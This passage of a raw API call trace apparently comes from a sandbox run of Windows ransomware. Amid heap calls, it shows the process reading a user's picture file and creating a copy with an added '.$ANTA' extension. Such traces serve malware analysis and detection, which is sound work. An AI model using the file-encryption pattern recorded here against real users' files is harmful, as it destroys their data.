HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0087.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0087.347] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0087.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.347] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0087.347] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0087.347] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0087.348] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.348] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.348] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bwdi74zs0.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0087.348] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.348] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.349] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0087.349] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0087.349] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0087.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0087.351] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0087.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0087.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\bwdi74zs0.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.352] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0087.352] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0087.353] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0087.353] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0087.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0087.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e03020 [0087.356] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0087.356] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x7fc1, lpOverlapped=0x0) returned 1 [0087.357] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0087.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7fc1) returned 0x4516010 [0087.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, 